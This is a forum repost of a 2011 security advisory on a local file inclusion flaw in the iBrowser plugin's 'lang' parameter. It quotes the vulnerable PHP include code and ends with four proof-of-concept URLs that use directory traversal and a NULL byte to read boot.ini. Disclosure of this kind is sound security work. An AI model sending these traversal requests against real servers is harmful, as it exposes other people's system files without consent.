Gonzalez Posted September 17, 2011 Report Share Posted September 17, 2011 iBrowser Plugin v1.4.1 (lang) Local File Inclusion VulnerabilityVendor: net4visions.comProduct web page: http://www.net4visions.comAffected version: <= 1.4.1 Build 10182009Summary: iBrowser is an image browser plugin for WYSIWYG editors liketinyMCE, SPAW, htmlAREA, Xinha and FCKeditor developed by net4visions.It allows image browsing, resizing on upload, directory management andmore with the integration of the phpThumb image library.Desc: iBrowser suffers from a file inlcusion vulnerability (LFI) / filedisclosure vulnerability (FD) when input passed thru the 'lang' parameterto ibrowser.php, loadmsg.php, rfiles.php and symbols.php is not properlyverified before being used to include files. This can be exploited toinclude files from local resources with directory traversal attacks andURL encoded NULL bytes.======================================================================/langs/lang.class.php:----------------------------------------------------------------------67: function loadData() {68: global $cfg;69: include( dirname(__FILE__) . '/' . $this -> lang.'.php' );70: $this -> charset = $lang_charset;71: $this -> dir = $lang_direction;72: $this -> lang_data = $lang_data;73: unset( $lang_data );74: include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );75: $this -> default_lang_data = $lang_data;76: }======================================================================Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail comAdvisory ID: ZSL-2011-5041Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5041.php15.09.2011--http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00 Quote Link to comment Share on other sites More sharing options...